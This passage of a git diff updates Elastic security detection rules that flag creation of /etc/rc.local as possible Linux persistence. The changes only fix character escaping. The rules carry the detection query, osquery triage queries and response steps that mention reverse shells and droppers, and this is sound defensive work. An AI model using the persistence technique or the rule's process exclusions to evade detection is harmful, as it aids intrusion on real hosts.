FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. \n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type : \"linux\" and event.category : \"file\" and \nevent.type : (\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and\nfile.path : \"/etc/rc.local\" and not file.extension : \"swp\"\n", "references": [ "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_105.json b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_105.json index 5b4460f8cb3..df8a66b2cf4 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_105.json @@ -17,7 +17,7 @@ "host.id", "process.executable" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. \n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. \n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type : \"linux\" and event.category : \"file\" and \nevent.type : (\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and\nfile.path : \"/etc/rc.local\" and not process.name : (\"dockerd\" or \"yum\" or \"rpm\" or \"dpkg\") and not file.extension : (\"swp\" or \"swx\")\n", "references": [ "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_106.json b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_106.json index 5702a63834d..4ebfff49bdc 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_106.json @@ -17,7 +17,7 @@ "host.id", "process.executable" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. \n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. \n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type : \"linux\" and event.category : \"file\" and \nevent.type : (\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and\nfile.path : \"/etc/rc.local\" and not process.name : (\"dockerd\" or \"docker\" or \"dnf\" or \"yum\" or \"rpm\" or \"dpkg\") and not file.extension : (\"swp\" or \"swx\")\n", "references": [ "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_107.json b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_107.json index 6db10452079..0e0d8cb827c 100644 --- a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_107.json @@ -18,7 +18,7 @@ "process.executable", "user.id" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. \n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly 